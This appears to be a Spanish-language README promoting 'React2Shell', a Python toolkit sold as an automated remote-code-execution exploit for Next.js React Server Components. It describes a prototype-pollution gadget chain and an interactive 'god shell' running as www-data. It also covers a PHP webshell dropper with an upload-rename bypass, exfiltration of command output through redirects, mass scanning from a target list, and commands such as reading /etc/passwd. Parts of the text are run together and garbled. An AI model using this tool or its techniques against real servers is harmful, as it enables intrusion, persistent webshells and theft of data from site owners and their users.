
React2Shell - Exploit RCE CVE-2025-66478
Este toolkit en Python explota la polución de prototipos de los React Server Components (RSC) de Next.js + la cadena de gadgets React.lazy(-1) para obtener acceso completo de RCE, incluyendo un shell interactivo 'god shell', subida de archivos (dropper de webshell PHP) y exfiltración vía ?out=.

Detección y explotación automatizada de aplicaciones Next.js vulnerables (p.ej., target.com). Obtiene un shell uid=33(www-data) con:
child_process.execSync → /exploit?out=UIDread /etc/passwd), subidas{\"0\":null} → 500 E{\"digest confirma el manejador RSC.Location: /exploit?out=id_outputexecSync(cmd) → exfiltrar stdout/stderr mediante redirección.upload_txt local.txt remote.php → bypass de escritura+renombrado.pip3 install aiohttppython3 main.pyhttp://target.com o targets.txt1=Detectar 2=PoC(id) 3=Personalizado 4=God Shell [4]Tubería: echo \"http://target\n4\" | python3 main.py
Comandos del God Shell:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
Solo para pruebas de penetración autorizadas y fines educativos (el usuario confirmó permiso bajo los Términos de Servicio). El uso no autorizado es ilegal/antiético.
Invítame un café:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans